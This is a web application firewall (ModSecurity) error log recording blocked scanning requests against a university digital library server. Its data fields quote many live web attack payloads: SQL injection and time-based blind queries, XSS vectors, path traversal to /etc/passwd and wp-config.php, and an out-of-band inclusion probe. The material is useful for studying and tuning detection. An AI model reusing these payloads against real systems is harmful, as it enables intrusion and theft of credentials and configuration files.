[Tue Aug 29 11:36:33.561269 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: % found within ARGS:keyword: %61%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%27%27%2b%28%53%45%4c%45%43%54%20%6d%64%35%28%39%39%39%39%39%39%39%29%29%2b%27"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/mobile/plugin/browser.jsp"] [unique_id "ZO110cCo-f0AAAUbg78AAABQ"]
[Tue Aug 29 11:36:34.405372 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:ID: <svg onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO110sCo-f0AAAUbg8QAAABQ"]
[Tue Aug 29 11:36:36.958440 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ACS_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:ACS_path: ../../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/advanced_component_system/index.php"] [unique_id "ZO111MCo-f0AAAT@KzwAAAA2"]
[Tue Aug 29 11:36:37.389185 2023] [:error] [pid 1447] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:urlPath: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/getCorsFile"] [unique_id "ZO111cCo-f0AAAWnjhEAAAAT"]
[Tue Aug 29 11:36:37.430417 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:urlPath: file:///c://windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/getCorsFile"] [unique_id "ZO111cCo-f0AAAShCdIAAAAi"]
[Tue Aug 29 11:36:38.366840 2023] [:error] [pid 1456] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:href. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:href: ../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/_s_/dyn/Log_highlight"] [unique_id "ZO111sCo-f0AAAWwdPMAAAAe"]
[Tue Aug 29 11:36:39.503689 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gsb6w9msi668rj.oast.site found within TX:1: cjmnbitjmimt14dgn26gsb6w9msi668rj.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword"] [unique_id "ZO1118Co-f0AAASEJgkAAAAE"]
[Tue Aug 29 11:36:41.361152 2023] [:error] [pid 1445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO112cCo-f0AAAWlCc0AAAAR"]
[Tue Aug 29 11:36:41.466670 2023] [:error] [pid 1450] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cID: \\x22></iframe><svg/onload=alert(\\x222UdyWLo0lCLqcBCjs5YehILlcGu\\x22)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/ccm/system/panels/page/preview_as_user/preview"] [unique_id "ZO112cCo-f0AAAWquqQAAAAX"]
[Tue Aug 29 11:36:42.365814 2023] [:error] [pid 1436] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/LetsEncrypt/Index"] [unique_id "ZO112sCo-f0AAAWcCScAAAAL"]
[Tue Aug 29 11:36:43.430829 2023] [:error] [pid 1437] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:idusuario. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:idusuario: '"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/controller/login.php"] [unique_id "ZO1128Co-f0AAAWdsm4AAAAM"]
[Tue Aug 29 11:36:44.408063 2023] [:error] [pid 1423] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:idusuario. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '' found within ARGS:idusuario: ''"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/controller/login.php"] [unique_id "ZO113MCo-f0AAAWPpZEAAAAH"]
[Tue Aug 29 11:36:49.485080 2023] [:error] [pid 1388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pdf. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:pdf: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/report/download.php"] [unique_id "ZO114cCo-f0AAAVsUfUAAAAb"]
[Tue Aug 29 11:36:56.535298 2023] [:error] [pid 1447] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:filename: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/wpsite-background-takeover/exports/download.php"] [unique_id "ZO116MCo-f0AAAWnjoIAAAAT"]
[Tue Aug 29 11:36:57.511612 2023] [:error] [pid 1461] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )>\\x22@ found within ARGS:login: \\x22<svg/onload=alert(document.domain)>\\x22@gmail.com"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/thruk/cgi-bin/login.cgi"] [unique_id "ZO116cCo-f0AAAW1WgUAAAAD"]
[Tue Aug 29 11:37:07.788235 2023] [:error] [pid 1469] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/download.php"] [unique_id "ZO1188Co-f0AAAW9IRQAAAAI"]
[Tue Aug 29 11:37:09.503536 2023] [:error] [pid 1470] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO119cCo-f0AAAW@X6IAAAAL"]
[Tue Aug 29 11:37:16.393433 2023] [:error] [pid 1454] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 4"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/fuel/pages/items/"] [unique_id "ZO11-MCo-f0AAAWuq9cAAAAZ"]
[Tue Aug 29 11:37:16.458970 2023] [:error] [pid 1454] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11-MCo-f0AAAWuq9oAAAAZ"]
[Tue Aug 29 11:37:16.537583 2023] [:error] [pid 1472] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:tf_version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:tf_version: ' and (select pg_sleep(10)) ISNULL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/api/search/attribute"] [unique_id "ZO11-MCo-f0AAAXA9W4AAAAO"]
[Tue Aug 29 11:37:27.391752 2023] [:error] [pid 1483] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:appno. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union SELECT found within ARGS:appno:  1 union SELECT 98989*443131,1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/admin/"] [unique_id "ZO12B8Co-f0AAAXL690AAAAb"]
[Tue Aug 29 11:37:35.455291 2023] [:error] [pid 1455] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:log_filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:log_filename: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO12D8Co-f0AAAWvFGUAAAAa"]
[Tue Aug 29 11:37:37.415004 2023] [:error] [pid 1482] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php"] [unique_id "ZO12EcCo-f0AAAXK59EAAAAY"]
[Tue Aug 29 11:37:45.494799 2023] [:error] [pid 1476] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:dbkey:syslog.rlog. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:dbkey:syslog.rlog: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/page/sl_logdl"] [unique_id "ZO12GcCo-f0AAAXEH8kAAAAN"]
[Tue Aug 29 11:37:47.589661 2023] [:error] [pid 1472] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ):\\x0a     found within ARGS:script: from pyspider.libs.base_handler import *\\x0aclass Handler(BaseHandler):\\x0a    def on_start(self):\\x0a        print(str(452345672   567890765))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/debug/pyspidervulntest/run"] [unique_id "ZO12G8Co-f0AAAXA9jkAAAAO"]
[Tue Aug 29 11:37:50.507182 2023] [:error] [pid 1476] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bf_text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:bf_text: \\x22><img src=x onerror=console.log(123);>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO12HsCo-f0AAAXEH-gAAAAN"]
[Tue Aug 29 11:37:52.387527 2023] [:error] [pid 1469] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:next_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:next_file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/adm/file.cgi"] [unique_id "ZO12IMCo-f0AAAW9IhcAAAAI"]
[Tue Aug 29 11:37:59.437487 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:logfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:logfile: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/usc-e-shop/functions/content-log.php"] [unique_id "ZO12J8Co-f0AAAUFdqoAAAA9"]
[Tue Aug 29 11:37:59.439170 2023] [:error] [pid 1493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:lastname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:lastname: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO12J8Co-f0AAAXVyngAAAAB"]
[Tue Aug 29 11:38:10.803631 2023] [:error] [pid 1523] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/down_data.php"] [unique_id "ZO12MsCo-f0AAAXz6@UAAAAk"]
[Tue Aug 29 11:38:14.958298 2023] [:error] [pid 1122] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "116.206.15.31_f312355e526c0f38cfd426b7fb99f1d2bd0bc030"): Internal error [hostname "digilibfh.unla.ac.id"] [uri "/manager/html"] [unique_id "ZO12NsCo-f0AAARiDu0AAAAJ"]
[Tue Aug 29 11:38:15.147427 2023] [:error] [pid 1476] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "114.10.4.34_7f33ed892f28c96e8d19d7642aad69d94fceed4d"): Internal error [hostname "digilibfh.unla.ac.id"] [uri "/manager/html"] [unique_id "ZO12NsCo-f0AAAXEIDYAAAAN"]
[Tue Aug 29 11:38:23.475730 2023] [:error] [pid 1397] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:path: ../../../../../../../../../../etc/./zpx/../passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/pacsone/nocache.php"] [unique_id "ZO12P8Co-f0AAAV1EYgAAAAd"]
[Tue Aug 29 11:38:33.376765 2023] [:error] [pid 1521] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cID: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/FlagEm/flagit.php"] [unique_id "ZO12ScCo-f0AAAXxYPIAAAAh"]
